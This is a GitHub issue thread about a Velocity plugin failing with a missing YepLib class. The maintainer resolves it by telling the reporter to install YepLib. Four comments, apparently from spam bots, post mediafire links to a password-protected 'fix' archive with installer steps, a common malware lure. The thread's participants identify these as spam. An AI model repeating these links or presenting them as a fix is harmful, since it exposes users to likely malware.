### ISSUE TITLE
[Bug] Couldn't pass ProxyInitializeEvent to velocitycarbondiscord 

### ISSUE THREAD

**Issue by rm20killer** [Jarva/VelocityCarbonDiscord#9]
Get this error when starting the server on Velocity 3.3.0.
Events like server starting, player joining/leaving, deaths, advancements don't work

`[18:50:34] [Velocity Async Event Executor - #0/INFO] [velocitycarbondiscord]: Created listener for channels carbon:global 1017452335179501710
[18:50:34] [Velocity Async Event Executor - #0/ERROR] [com.velocitypowered.proxy.event.VelocityEventManager]: Couldn't pass ProxyInitializeEvent to velocitycarbondiscord 2.0.1
java.lang.NoClassDefFoundError: cc/unilock/yeplib/api/AdvancementType
	at java.base/java.lang.Class.getDeclaredMethods0(Native Method) ~[?:?]
	at java.base/java.lang.Class.privateGetDeclaredMethods(Class.java:3578) ~[?:?]
	at java.base/java.lang.Class.getDeclaredMethods(Class.java:2676) ~[?:?]
	at com.velocitypowered.proxy.event.VelocityEventManager.collectMethods(VelocityEventManager.java:251) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.velocitypowered.proxy.event.VelocityEventManager.registerInternally(VelocityEventManager.java:372) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.velocitypowered.proxy.event.VelocityEventManager.register(VelocityEventManager.java:347) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.github.jarva.velocitycarbondiscord.discord.ClientHolder.initialize(ClientHolder.java:111) ~[?:?]
	at com.github.jarva.velocitycarbondiscord.VelocityCarbonDiscord.registerAll(VelocityCarbonDiscord.java:115) ~[?:?]
	at com.github.jarva.velocitycarbondiscord.VelocityCarbonDiscord.onProxyInitialization(VelocityCarbonDiscord.java:97) ~[?:?]
	at com.github.jarva.velocitycarbondiscord.Lmbda$31.execute(Unknown Source) ~[?:?]
	at com.velocitypowered.proxy.event.UntargetedEventHandler$VoidHandler.lambda$buildHandler$0(UntargetedEventHandler.java:56) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.velocitypowered.proxy.event.VelocityEventManager.fire(VelocityEventManager.java:598) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.velocitypowered.proxy.event.VelocityEventManager.lambda$fire$5(VelocityEventManager.java:479) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144) ~[?:?]
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642) ~[?:?]
	at java.base/java.lang.Thread.run(Thread.java:1583) [?:?]
Caused by: java.lang.ClassNotFoundException: cc.unilock.yeplib.api.AdvancementType
	at com.velocitypowered.proxy.plugin.PluginClassLoader.loadClass0(PluginClassLoader.java:87) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at com.velocitypowered.proxy.plugin.PluginClassLoader.loadClass(PluginClassLoader.java:64) ~[velocity.jar:3.3.0-SNAPSHOT (git-6100e675-b416)]
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:526) ~[?:?]
	... 16 more`

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by unilock** [comment]
@rm20killer Install YepLib as a Velocity plugin. https://github.com/unilock/YepLib/releases

I have no idea what these spam bots are doing here.

**Comment by rm20killer** [comment]
That worked, thank you 🤗.

_I wasn't expecting to see spam bots. Hopefully GitHub can take care of them_

**Comment by unilock** [comment]
What's weird is that advancement / death compatibility shouldn't load at all if YepLib isn't present. Seems like Velocity itself uses bizarre reflection for god knows what reason, causing a classload of YepLib classes that aren't present... kinda horrifying.
